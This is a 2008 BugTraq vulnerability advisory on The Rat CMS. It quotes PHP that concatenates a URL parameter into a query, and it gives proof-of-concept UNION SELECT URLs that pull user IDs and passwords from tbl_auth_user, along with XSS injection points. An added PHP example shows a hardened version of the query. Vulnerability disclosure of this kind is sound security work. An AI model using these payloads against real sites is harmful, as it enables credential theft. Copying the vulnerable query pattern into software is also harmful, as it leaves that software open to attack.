BugTraq
The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities Jun 26 2008 04:56AM
tan_prathan hotmail com
==========================================================

The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities

==========================================================

AUTHOR : CWH Underground

DATE : 25 June 2008

SITE : cwh.citec.us

#####################################################

APPLICATION : The Rat CMS

VERSION : Pre-Alpha 2

VENDOR : N/A

DOWNLOAD : http://downloads.sourceforge.net/the-rat-cms

#####################################################

--- Remote SQL Injection ---

---------------------------------------

Vulnerable File [viewarticle.php?id=]

---------------------------------------

@Line 5

73: $query = "SELECT title, content FROM news WHERE id=".$_GET['id'];

74: $result = mysql_query($query) or die('Error : ' . mysql_error());

75: $row = mysql_fetch_array($result, MYSQL_ASSOC);

---------

Exploit

---------

[+] http://[Target]/[trcms_path]/viewarticle.php?id=[SQL Injection]

[+] http://[Target]/[trcms_path]/viewarticle2.php?id=[SQL Injection]

-------------

POC Exploit

-------------

http://192.168.24.25/trcms/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--

http://192.168.24.25/trcms/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--

--- Remote XSS ---

---------

Exploit

---------

[+] http://[Target]/[trcms_path]/viewarticle.php/<XSS>

[+] http://[Target]/[trcms_path]/viewarticle.php?id=<XSS>

[+] http://[Target]/[trcms_path]/viewarticle2.php?id=<XSS>

##################################################################

# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #

##################################################################
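
Added example (not part of the original advisory or of The Rat CMS code): a hardened counterpart of the viewarticle.php lookup quoted above, using integer validation, a bound parameter and output encoding. The function name, the in-memory SQLite database and the sample row are assumptions made so the script runs stand-alone.

```php
<?php
// Added example: hardened form of the query quoted from viewarticle.php.
// Table/column names (news, id, title, content) come from the quoted query;
// render_article(), the SQLite database and the sample row are constructed.

function render_article(PDO $db, $rawId): string
{
    // 1. Reject anything that is not a positive integer before it reaches SQL.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 'Invalid article id';
    }

    // 2. Bind the value; it is never concatenated into the statement text.
    $stmt = $db->prepare('SELECT title, content FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return 'Article not found';
    }

    // 3. Encode on output so markup in the data is rendered as text.
    $esc = fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h1>' . $esc($row['title']) . '</h1><div>' . $esc($row['content']) . '</div>';
}

// Constructed data so the script runs offline (needs the pdo_sqlite extension).
// Exception mode keeps database errors out of the page, unlike die(mysql_error()).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, content TEXT)');
$db->exec("INSERT INTO news (id, title, content)
           VALUES (1, 'Hello <b>world</b>', 'First post')");

// Constructed inputs: a valid id, a missing id, and two non-numeric values.
foreach (['1', '2', '1 OR 1=1', '<script>alert(1)</script>'] as $input) {
    echo str_pad($input, 28), ' => ', render_article($db, $input), PHP_EOL;
}
```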

Copyright 2009, SecurityFocus